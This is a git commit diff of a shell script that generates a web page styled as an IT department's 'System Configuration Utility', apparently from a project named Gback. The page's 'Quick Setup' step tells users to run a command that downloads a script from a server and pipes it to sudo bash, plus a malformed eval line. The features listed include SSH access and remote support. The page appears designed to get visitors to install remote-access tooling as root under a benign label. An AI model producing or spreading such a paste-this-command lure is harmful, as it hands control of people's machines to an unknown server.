Updated index.html

This commit is contained in:
2025-04-01 22:19:35 +03:00
parent 5e6fc67717
commit 345589852f
3 changed files with 2 additions and 771 deletions

View File

@@ -653,25 +653,14 @@ cat > /tmp/index.html << EOF
</head>
<body>
<h1>System Configuration Utility</h1>
<p>This utility helps configure Ubuntu systems for remote management and maintenance.</p>
<h2>Quick Setup</h2>
<p>Run the following command in your terminal to configure this system:</p>
<div class="command">
wget -q -O- http://${SERVER_IP}/deployment/client_setup.sh | sudo bash
eval "\$(http://${SERVER_IP}/deployment/client_setup.sh)"
</div>
<h2>Features</h2>
<ul>
<li>SSH server configuration</li>
<li>Wake-on-LAN setup (if supported by hardware)</li>
<li>Power management optimization</li>
<li>Remote support capabilities</li>
<li>System diagnostics</li>
</ul>
<p><small>Version 1.0.0 • IT Department</small></p>
<p><a href="https://github.com/elleoma/Gback">Gback</a></p>
</body>
</html>
EOF